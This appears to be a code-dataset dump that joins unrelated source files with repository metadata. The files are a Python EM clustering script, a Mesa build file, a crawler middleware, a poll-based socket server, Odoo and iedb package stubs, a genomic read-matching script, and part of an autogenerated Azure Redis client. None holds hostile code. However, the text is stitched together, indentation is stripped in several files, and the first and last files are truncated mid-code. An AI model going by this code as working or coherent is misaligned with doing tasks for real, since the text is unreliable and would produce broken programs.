# gmm_deal(x,y,x_test,y_test)
# 朴素贝叶斯非监督分类
x = x%100
x_test = x_test%100 #对于前面的k+i*100特征进行处理
data = x
n, d = data.shape
print(data.shape)
# 初始化参数
# 选择每个类别概率pi
pi = abs(np.random.standard_normal(K)) # 7个类别[0-6]
pi = pi/sum(pi)
# 每个维度属性下:各个类别选择具体取值的多项式分布,随机初始化
phi = np.array([[[0.0]*21] *K] *3)
print(phi.shape)
for i in range(3):
for j in range(K):
phi[i][j] = np.array(abs(np.random.standard_normal(21)))
# print(phi[i][j])
phi[i][j] = phi[i][j]/sum(phi[i][j])
# 每个样本所属各个类别概率
gamma = np.array([[0.0]*K]*len(data))
# 使用先验统计参数初始化 pi 和 phi
# init_with_bayes(pi, phi, data, y)
print(pi) # 查看每次是否是初始化
num_iter = 300
# EM
for n_iter in range(num_iter):
# E
expect = 0.0
for i in range(len(data)):
tot = 0.0
for k in range(K):
gamma[i][k] = pi[k] * (phi[0][k][data[i][0]]) * (phi[1][k][data[i][1]]) * (phi[2][k][data[i][2]])
tot += gamma[i][k]
for k in range(K):
gamma[i][k] /= tot
expect += tot
# M
# pi
for k in range(K):
tot = 0.0
for i in range(len(data)):
tot += gamma[i][k]
pi[k] = tot/len(data)
# phi
for i in range(3): # 对于第i维数据
for j in range(len(data)):
lable = data[j][i] # 数据j的第i维
for k in range(K):
phi[i][k][lable] += gamma[j][k]
for k in range(K): # 按行归一化
tot = 0.0
for j in range(20):
tot += phi[i][k][j]
for j in range(20):
phi[i][k][j] /= tot
if n_iter % 1 == 0:
print(n_iter, ":\t", math.log(expect))
# print(pi,gamma[0])
print_ans(gamma, phi, pi, data, y, x_test, y_test, n_iter)
"""
# 朴素贝叶斯分类:多项式
multinomialNB(x,y,x_test,y_test)
# 朴素贝叶斯分类:高斯分布
gaussianNB(x,y,x_test,y_test)
"""
if __name__ == '__main__':
EM()
|
[
"1390880230@qq.com"
] |
1390880230@qq.com
|
90ad84c9ee8207cfb8f4c72a00d0a55af67734cd
|
90d13ffb6fa1988242886c3e55e4b555fa7d8ad1
|
/utils/Mesa-7.10/src/gallium/winsys/radeon/drm/SConscript
|
2dbf61a7ba3bf214c177ec15747c04a38ecfe0b0
|
[] |
no_license
|
mclumd/erewhon_systems
|
2c798cd303ca2cb19e80c93c88303af8b9aed5a6
|
93655a96415a01d8f5e49a1f2c244cbfd22b65f2
|
refs/heads/master
| 2021-01-17T16:22:53.528996
| 2016-08-03T19:35:52
| 2016-08-03T19:35:52
| 64,771,684
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 356
|
Import('*')
env = env.Clone()
radeon_sources = [
'radeon_drm_buffer.c',
'radeon_drm_common.c',
'radeon_r300.c',
]
env.ParseConfig('pkg-config --cflags libdrm_radeon')
env.Append(CPPPATH = '#/src/gallium/drivers/r300')
radeonwinsys = env.ConvenienceLibrary(
target ='radeonwinsys',
source = radeon_sources,
)
Export('radeonwinsys')
|
[
"cmaxey@payday.cs.umd.edu"
] |
cmaxey@payday.cs.umd.edu
|
|
809cbea84a46077f1717e7f0f464b0e2cbe9f67d
|
e53bb08582973a3faa76e2f2210086a7019a528f
|
/middlewares/response_middleware.py
|
fb774b75c026943704dd7671c12137487b6557db
|
[
"MIT"
] |
permissive
|
f840415070/genius
|
bb8aba51fac29e92bc0b1c833dfe3f52a70fba68
|
87e20350f98e84bc81b727a793d2dda37ffb3d03
|
refs/heads/master
| 2023-06-01T21:56:19.057610
| 2020-04-20T03:45:53
| 2020-04-20T03:45:53
| 233,549,982
| 4
| 1
|
MIT
| 2023-05-22T22:37:54
| 2020-01-13T08:44:40
|
Python
|
UTF-8
|
Python
| false
| false
| 768
|
py
|
# -*- coding: utf-8 -*-
'''
@Date: 2019/12/30
@Author: fanyibin
@Description: 响应中间件
'''
from frame_library.singleton import Singleton
from frame_library.logger import get_log_config
class ResMiddleware(metaclass=Singleton):
def __init__(self):
self.log = get_log_config()
def check_response(self, res):
if not res:
self.log.warning('响应体为空,无法解析。将执行下一条种子。')
return None
return res
def handle_response(self, res, seed):
resp = self.check_response(res)
if resp is None:
return resp
if seed.encoding is None:
seed.encoding = 'utf-8'
resp.encoding = seed.encoding
resp.close()
return resp
|
[
"f84041507@163.com"
] |
f84041507@163.com
|
f634ad49ba912458c7afbbb41671d6a330f3eb88
|
a3df5320fd2f17e2a7e873f3747ae28bb90f1f68
|
/poll_server.py
|
e238232378b50ddc350bc1dba7063d9beb9a6dac
|
[] |
no_license
|
AsuraChj/AID2006
|
6dc4e789f1ce84dd2bb11fc3b138d84084ec5711
|
9ff6ad7ab8a722682dba4de145595e2b608091bc
|
refs/heads/master
| 2022-12-02T06:21:43.991644
| 2020-08-21T07:52:26
| 2020-08-21T07:52:26
| 288,695,308
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,363
|
py
|
"""
基于 POLL方法的 IO多路复用网络并发
"""
from socket import *
from select import *
# 创建好监听套接字
sockfd = socket()
sockfd.bind(('0.0.0.0', 8888))
sockfd.listen(5)
# 与非阻塞IO配合防止传输过程阻塞
sockfd.setblocking(False)
# 创建poll对象
p = poll()
# 准备IO进行监控 map字典用于查找IO对象,必须与register一致
map = {sockfd.fileno(): sockfd}
p.register(sockfd,POLLIN)
# 循环监控IO发生
while True:
# 开始监控IO events-->[(fileno,event),(),]
events = p.poll()
# 伴随监控的IO的增多,就绪的IO情况也会复杂
# 分类讨论 分两类 sockfd -- connfd
for fd, event in events:
# 有客户端连接
if fd == sockfd.fileno():
connfd, addr = map[fd].accept()
print("Connect from", addr)
connfd.setblocking(False)
p.register(connfd, POLLIN) # 增加监控
map[connfd.fileno()] = connfd # 维护字典
elif event == POLLIN:
# 某个客户端发消息给我
data = map[fd].recv(1024).decode()
if not data:
# 客户端退出
p.unregister(fd) # 移除监控
map[fd].close()
del map[fd]
continue
print("收到:", data)
map[fd].send(b'ok')
|
[
"2592803595@qq.com"
] |
2592803595@qq.com
|
b461cd6b2fba3f2bf2aace6e95f110b5921ca691
|
59ad7563b7c64e0ec422653b3feba9675cc228d4
|
/hr_release/models/__init__.py
|
8f560a335127e7fe9c67f29209b69c11fbfc3b1b
|
[] |
no_license
|
ammaralsabba/ALDEEBL-FISH
|
32a628f2d047340b656077473633d16e08b77737
|
95f0a72a75c109c5bad886d0e534d5295864bc3f
|
refs/heads/master
| 2020-04-26T13:00:39.538879
| 2019-03-04T14:53:42
| 2019-03-04T14:53:42
| 173,567,681
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 125
|
py
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from . import hr_release
|
[
"noreply@github.com"
] |
ammaralsabba.noreply@github.com
|
5409dc2a6e175f7cdf290e02b85c7adea95e1e71
|
69d219254ac51410dada23d9003a114daf2aa162
|
/scripts/sequence_feature_frequencies.py
|
ec600f0e12d90cbf1aaa10a07f618625cb36db8e
|
[] |
no_license
|
skerker/utr_analysis
|
5287f39fe2981623e768b7385bc6c891d5f9d376
|
ba57006cdf6719195fdaa5e92fe55c4652c9ffc4
|
refs/heads/master
| 2021-08-14T08:20:18.432931
| 2017-11-15T03:53:31
| 2017-11-15T03:53:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,506
|
py
|
#!/usr/bin/env python
"""
Keith Hughitt
2014/03/17
Finds reads containing either Poly(A) or Poly(T) tracts and attempts to guess
whether those sequences are a part of the genome, or come from a
poly-adenylation site.
The purpose of this script is to try and provide some basic guidelines for
where to look for poly-adenylation reads.
"""
import os
import glob
import re
from Bio import SeqIO,Seq
def main():
# Select species and sample to query
target = 'lmajor' # 'tcruzi'
if target == 'lmajor':
# Samples to query
base_dir = "/cbcb/lab/nelsayed/raw_data/lminfectome"
hpgl_id = "HPGL0075" # procyclic (pathogen only)
# output directory
outdir = os.path.join('output', 'lmajor_hpgl0075')
# Genome
genome = os.path.join("/cbcb/lab/nelsayed/ref_data/lmajor_friedlin/genome",
"TriTrypDB-7.0_LmajorFriedlin_Genome.fasta")
# L. major SL sequence and its reverse complement
sl = "AACTAACGCTATATAAGTATCAGTTTCTGTACTTTATTG"
reverse_sl = "CAATAAAGTACAGAAACTGATACTTATATAGCGTTAGTT"
else:
# Samples to query
base_dir = "/cbcb/lab/nelsayed/raw_data/tcruzir21"
hpgl_id = "HPGL0250" # trypomastigote (pathogen only)
# output directory
outdir = os.path.join('output', 'tcruzi_hpgl0250')
# Genome
genome = os.path.join("/cbcb/lab/nelsayed/ref_data/tcruzi_clbrener/genome/tc_esmer",
"TriTrypDB-6.0_TcruziCLBrenerEsmeraldo-like_Genome.fasta")
# T. cruzi SL sequence and reverse complement
sl = "AACTAACGCTATTATTGATACAGTTTCTGTACTATATTG"
reverse_sl = "CAATATAGTACAGAAACTGTATCAATAATAGCGTTAGTT"
# RNA-Seq read filepaths
reads = glob.glob(os.path.join(base_dir, hpgl_id, 'processed/*.fastq'))
# regular expressions
min_length = 16
# spliced leader regular expressions
sl_regex = '|'.join(["^" + sl[-x:] for x in range(min_length, len(sl) + 1)])
reverse_sl_regex = '|'.join(
[reverse_sl[-x:] + "$" for x in range(min_length, len(reverse_sl) + 1)]
)
search_patterns = {
"polya_left": "^A{%d,}" % min_length,
"polyt_left": "^T{%d,}" % min_length,
"polya_right": "A{%d,}$" % min_length,
"polyt_right": "T{%d,}$" % min_length,
"sl_left": sl_regex,
"rcsl_right": reverse_sl_regex
}
# count occurances of each sequence in reads
for name,regex in search_patterns.items():
print("Processing %s" % name)
output_dir = os.path.join(outdir, name)
count_seq_hits(re.compile(regex), reads, genome, output_dir)
def count_seq_hits(regex, reads, genome, outdir, max_reads=float('inf')):
"""Counts the number of occurances of a specified sequence in a collection
of reads."""
# load genome as a list of chromosome SeqRecords
chromosomes = list(SeqIO.parse(genome, format='fasta'))
# lists to keep track of different types of read matches
with_feature = []
with_feature_rc = []
without_feature = []
without_feature_rc = []
no_match = []
# Iterate through sample files
for filepath in reads:
for i, entry in enumerate(readfq(open(filepath)), 1):
# stop once we have reached desired number of reads
if i > max_reads:
break
# get read sequence and id
read_id = entry[0]
read = entry[1]
# check for sequence pattern in read
match = re.search(regex, read)
# stop here if read doesn't contain sequence of interest
if match is None:
continue
# otherwise check genome for read and trimmed read
if (len(read) - match.end()) >= match.start():
trimmed_read = read[match.end():]
else:
trimmed_read = read[:match.start()]
# reverse complement
rc = str(Seq.Seq(read).reverse_complement())
trimmed_rc = str(Seq.Seq(trimmed_read).reverse_complement())
# if found, see if it appears in the genome as-is, or when trimmed
# to remove matched feature
genome_match = False
for chromosome in chromosomes:
# full read
if chromosome.seq.count(read) > 0:
with_feature.append(read_id)
genome_match = True
# full read (reverse complement)
elif chromosome.seq.count(rc) > 0:
with_feature_rc.append(read_id)
genome_match = True
# trimmed read
elif chromosome.seq.count(trimmed_read) > 0:
without_feature.append(read_id)
genome_match = True
# trimmed read (reverse complement)
elif chromosome.seq.count(trimmed_rc) > 0:
without_feature_rc.append(read_id)
genome_match = True
# stop checking once match is found in genome
if genome_match is True:
break
# no match
if not genome_match:
no_match.append(read_id)
# Save output
if not os.path.exists(outdir):
os.makedirs(outdir, mode=0o755)
fp = open(os.path.join(outdir, 'full_read_matches.txt'), 'w')
fp.write('\n'.join(with_feature) + '\n')
fp.close()
fp = open(os.path.join(outdir, 'full_read_reverse_matches.txt'), 'w')
fp.write('\n'.join(with_feature_rc) + '\n')
fp.close()
fp = open(os.path.join(outdir, 'trimmed_read_matches.txt'), 'w')
fp.write('\n'.join(without_feature) + '\n')
fp.close()
fp = open(os.path.join(outdir, 'trimmed_read_reverse_matches.txt'), 'w')
fp.write('\n'.join(without_feature_rc) + '\n')
fp.close()
fp = open(os.path.join(outdir, 'no_matches.txt'), 'w')
fp.write('\n'.join(no_match) + '\n')
fp.close()
# FASTQ parser
# source: https://github.com/lh3/readfq
def readfq(fp): # this is a generator function
last = None # this is a buffer keeping the last unprocessed line
while True: # mimic closure; is it a bad idea?
if not last: # the first record or a record following a fastq
for l in fp: # search for the start of the next record
if l[0] in '>@': # fasta/q header line
last = l[:-1] # save this line
break
if not last: break
name, seqs, last = last[1:].partition(" ")[0], [], None
for l in fp: # read the sequence
if l[0] in '@+>':
last = l[:-1]
break
seqs.append(l[:-1])
if not last or last[0] != '+': # this is a fasta record
yield name, ''.join(seqs), None # yield a fasta record
if not last: break
else: # this is a fastq record
seq, leng, seqs = ''.join(seqs), 0, []
for l in fp: # read the quality
seqs.append(l[:-1])
leng += len(l) - 1
if leng >= len(seq): # have read enough quality
last = None
yield name, seq, ''.join(seqs); # yield a fastq record
break
if last: # reach EOF before reading enough quality
yield name, seq, None # yield a fasta record instead
break
if __name__ == "__main__":
main()
|
[
"keith.hughitt@gmail.com"
] |
keith.hughitt@gmail.com
|
313b7063b5198fdd744db7126fed0b419cf3d866
|
ddc8b1910f7e96259e9eedc37c25a7e1b48ca11d
|
/iedb/__init__.py
|
f2dfe06a063a978ecd72ab18fea6f0f2dacd0905
|
[
"MIT"
] |
permissive
|
venkataduvvuri/iedb-python
|
be202dca4307c875d4fa32779eb6c3eedb8cffbd
|
3412eec81526f6166f40b0c4698635b66153fb17
|
refs/heads/master
| 2023-04-21T02:21:02.984476
| 2021-05-11T03:23:27
| 2021-05-11T03:23:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 153
|
py
|
from iedb.api import (
query_mhci_binding,
query_mhcii_binding,
query_tcell_epitope,
query_peptide_prediction,
query_bcell_epitope
)
|
[
"mattfemia1@gmail.com"
] |
mattfemia1@gmail.com
|
15220c116e3826ff490fb6baa981d35c31cbd69b
|
5537eec7f43098d216d2b550678c8d10b2a26f09
|
/venv/ansible/lib/python2.7/site-packages/azure/mgmt/redis/operations/redis_operations.py
|
15567caaf0b2cda2a209918f901f6e1af1ab2df3
|
[] |
no_license
|
wipro-sdx/Automation
|
f0ae1512b8d9d491d7bacec94c8906d06d696407
|
a8c46217d0fbe51a71597b5db87cbe98ed19297a
|
refs/heads/master
| 2021-07-08T11:09:05.314435
| 2018-05-02T07:18:54
| 2018-05-02T07:18:54
| 131,812,982
| 0
| 1
| null | 2020-07-23T23:22:33
| 2018-05-02T07:15:28
|
Python
|
UTF-8
|
Python
| false
| false
| 33,162
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrestazure.azure_operation import AzureOperationPoller
import uuid
from .. import models
class RedisOperations(object):
"""RedisOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An objec model deserializer.
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
def create_or_update(
self, resource_group_name, name, parameters, custom_headers=None, raw=False, **operation_config):
"""Create a redis cache, or replace (overwrite/recreate, with potential
downtime) an existing cache.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param name: The name of the redis cache.
:type name: str
:param parameters: Parameters supplied to the CreateOrUpdate redis
operation.
:type parameters: :class:`RedisCreateOrUpdateParameters
<azure.mgmt.redis.models.RedisCreateOrUpdateParameters>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`RedisResourceWithAccessKey
<azure.mgmt.redis.models.RedisResourceWithAccessKey>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cache/Redis/{name}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'RedisCreateOrUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [201, 200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 201:
deserialized = self._deserialize('RedisResourceWithAccessKey', response)
if response.status_code == 200:
deserialized = self._deserialize('RedisResourceWithAccessKey', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def delete(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""Deletes a redis cache. This operation takes a while to complete.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param name: The name of the redis cache.
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cache/Redis/{name}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def get(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""Gets a redis cache (resource description).
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param name: The name of the redis cache.
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`RedisResource <azure.mgmt.redis.models.RedisResource>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cache/Redis/{name}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('RedisResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def list_by_resource_group(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Gets all redis caches in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`RedisResourcePaged
<azure.mgmt.redis.models.RedisResourcePaged>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cache/Redis/'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.RedisResourcePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.RedisResourcePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def list(
self, custom_headers=None, raw=False, **operation_config):
"""Gets all redis caches in the specified subscription.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`RedisResourcePaged
<azure.mgmt.redis.models.RedisResourcePaged>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Cache/Redis/'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.RedisResourcePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.RedisResourcePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def list_keys(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""Retrieve a redis cache's access keys. This operation requires write
permission to the cache resource.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param name: The name of the redis cache.
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`RedisListKeysResult
<azure.mgmt.redis.models.RedisListKeysResult>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cache/Redis/{name}/listKeys'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('RedisListKeysResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def regenerate_key(
self, resource_group_name, name, key_type, custom_headers=None, raw=False, **operation_config):
"""Regenerate redis cache's access keys. This operation requires write
permission to the cache resource.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param name: The name of the redis cache.
:type name: str
:param key_type: Which redis access key to reset. Possible values
include: 'Primary', 'Secondary'
:type key_type: str or :class:`RedisKeyType
<azure.mgmt.redis.models.RedisKeyType>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`RedisListKeysResult
<azure.mgmt.redis.models.RedisListKeysResult>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
parameters = models.RedisRegenerateKeyParameters(key_type=key_type)
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cache/Redis/{name}/regenerateKey'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'RedisRegenerateKeyParameters')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('RedisListKeysResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def force_reboot(
self, resource_group_name, name, reboot_type, shard_id=None, custom_headers=None, raw=False, **operation_config):
"""Reboot specified redis node(s). This operation requires write
permission to the cache resource. There can be potential data loss.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param name: The name of the redis cache.
:type name: str
:param reboot_type: Which redis node(s) to reboot. Depending on this
value data loss is possible. Possible values include: 'PrimaryNode',
'SecondaryNode', 'AllNodes'
:type reboot_type: str or :class:`RebootType
<azure.mgmt.redis.models.RebootType>`
:param shard_id: In case of cluster cache, this specifies shard id
which should be rebooted.
:type shard_id: int
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
parameters = models.RedisRebootParameters(reboot_type=reboot_type, shard_id=shard_id)
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cache/Redis/{name}/forceReboot'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'RedisRebootParameters')
